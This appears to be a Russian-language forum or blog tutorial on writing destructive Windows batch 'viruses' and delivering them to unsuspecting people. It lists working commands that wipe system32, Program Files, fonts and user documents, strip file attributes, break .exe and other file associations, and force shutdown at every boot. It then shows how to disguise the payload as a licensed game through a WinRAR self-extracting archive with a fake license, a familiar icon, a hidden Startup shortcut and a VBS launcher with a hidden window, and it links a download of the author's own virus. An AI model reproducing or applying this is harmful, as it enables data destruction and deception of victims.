конецформыначалоформыВ этой статье я не буду рассказывать как создовать вирусы с нуля вы уже это
узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).
В этой статье я научу вас
1.Ознокомлю с самыми злыми командами
2.Научу бат переделывать в exe
3.Предложу свою версию вируса
1.
Shutdown -t 0 –s -Эта команда выключает компютер
del *.* /q
После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:
del C:windowsfonts /q
Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:
del C:windowsMedia /q
Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.
del C:windowssystem32 /q /s
Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты «Скрытый» и «Системный» то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
del C:windows*.bmp /q /s
И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:
attrib -a -s -h -r C:*.*
del C:*.* /q
Но тут нам много удалить не дадут. Всё тристо раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:
rd %ProgramFiles% /s /q
А вот если написать:
rd C:Program Files /s /q
то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку «Program» и папку «Files». Ладно у нас есть зарезервированая команда для папки Program Files — %programfiles%. А если мы хотим удалить «Мои документы». То вирус будет искать папки «Мои» и «Документы». В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:
Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del «%USERPROFILE%Мои документы*.*» /q /s
———————————————————————————
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd «C:Documents and SettingsА тут чё писать????Рабочий стол» Видите где я вас спрашиваю «Тут чё писать» действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например «Рабочий стол» или «Мои документы» обязательно в начале пишите команду Chcp 1251
———————————————————————————
А если мы хотим удалить в папке «Windows» только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это… Но можно всё это написать в одной команде:
for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q
Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. «Жертва» его удаляет, а он при загрузке появляется снова. А если «жертва» мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать «жертве» вопросы о перезаписи… «жертва» сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.
if not VIR*?????????.sys goto x
exit 
МУСОР.
Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку «VIR». Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка «VIR» в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться… Где написано слово «МУСОР» должны быть написаны команды создования мусора.
———————————————————————————
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на «O» ; «P» ; «Q» ; «R» ; «S» ; «T» ; «U» или ещё какие (правильно делают). Безопасность, будь она не ладна.
rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска
chcp 1251
cd «%USERPROFILE%Главное менюПрограммы»
md 1 …и.т.д.
и папки будут создаваться в разделе программы.
Или допишите вот так…
chcp 1251
cd «%USERPROFILE%Главное менюПрограммыАвтозагрузка»
md 1 ….и.т.д.
допустим мы создадим 100 пустых папок в папке «Автозагрузка» и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…
Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…
assoc .lnk=.avi
здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!
assoc .exe=.avi
тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:
assoc .exe=
после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.
Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp
Можно путь для копирования поставить другой путь:
copy C:*.* C: program наш никчёмный файл появиться на диске С:
можно скопировать, что-нибудь другое:
copy C:windowssystem32*.* C:Microsoft*.exe
Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: «Создаём эффект программы» Есть другой способ копирования:
dir c: /s/a > C:/1.txt
Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:
copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK
Мы видим что я беру из папки «Windows» все текстовые файлы а из папки «Help» вообще все файлы и слепливаю кусок из всех них в файл «KUSOK» (од даже будет без расширения, но можно его и сделать, если пожелаете)
А можно полностью скопировать папку «system32″ в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.
xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.
———————————————————————————
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
———————————————————————————
Ах, совсем забыл, не пишите вот такую команду:
copy C:*.* C:Windows
А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.
Можно оповещать нашу жертву о ходе действия нашего вируса.
для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш
Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:
echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt
Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение «Для продолжения нажмите любую клавишу…».
pause
Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
———————————————————————————
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!
———————————————————————————
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк «WORD(а)» или картинки, то жертва без малейших подозрений с радостью запустит… хм… вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!
Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:
Chcp 1251
cd «%USERPROFILE%Главное менюПрограммыАвтозагрузка»
attrib +h
вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.
Но и тут есть запара жертва открывает вир видит выскакивает окно
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject(«WScript.Shell»)
WshShell.Run»C:sistem32Connect.bat «, 0, true
Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал
ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g
если чтото не поняли пишыте в коментарии я отвечу